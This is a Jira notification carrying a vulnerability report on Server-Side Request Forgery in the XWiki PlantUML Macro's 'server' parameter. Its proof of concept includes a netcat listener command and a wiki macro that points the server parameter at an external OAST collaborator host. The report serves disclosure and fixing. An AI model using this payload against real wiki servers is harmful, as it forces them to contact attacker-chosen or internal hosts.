There is 1 update.
 
 
PlantUML Macro / cid:jira-generated-image-avatar-4033e07b-822a-46be-8a2c-ab4ad947d118 PLANTUML-25 Open

Server-Side Request Forgery (SSRF) in PlantUML Macro via 'server' parameter

 
View issue   ·   Add comment
 

1 update

 
cid:jira-generated-image-avatar-c0ce3e0a-f8aa-464b-b87f-a328f501afd9 Changes by Łukasz Rybak on 26/Nov/25 07:12
 
Description: *Impact*

The PlantUML Macro is vulnerable to Server-Side Request Forgery (SSRF). The macro allows users to specify an alternative PlantUML server via the {{server}} parameter.

However, the application does not validate the supplied URL. An attacker can supply an internal IP address  or a malicious external URL. The XWiki server will attempt to connect to this URL to "render" the diagram.
h3.
*
PoC *

1. Use an OAST service (like Burp Collaborator)
or a local listener ({{{}nc -lvp 4444{}}}) to capture the interaction.

2.  Create a wiki page with the following content:
 
{{{{{}plantuml server="http://oqiusawt5ny84yw017u6qgnay14ssmgb.oastify.com"{}}}
@startuml
A -> B: SSRF Test
@enduml
{{{}/plantuml{}}}}}
!image-2025-11-26-06-54-50-628.png!

2. Save and View the page.
!image-2025-11-25-20-31-57-213.png!

3. The XWiki server initiates an HTTP connection to the specified target.

!image-2025-11-25-20-32-25-311.png!
h3.
*
Attribution *

Reported by: Łukasz Rybak GitHub: [https://github.com/lukasz-rybak]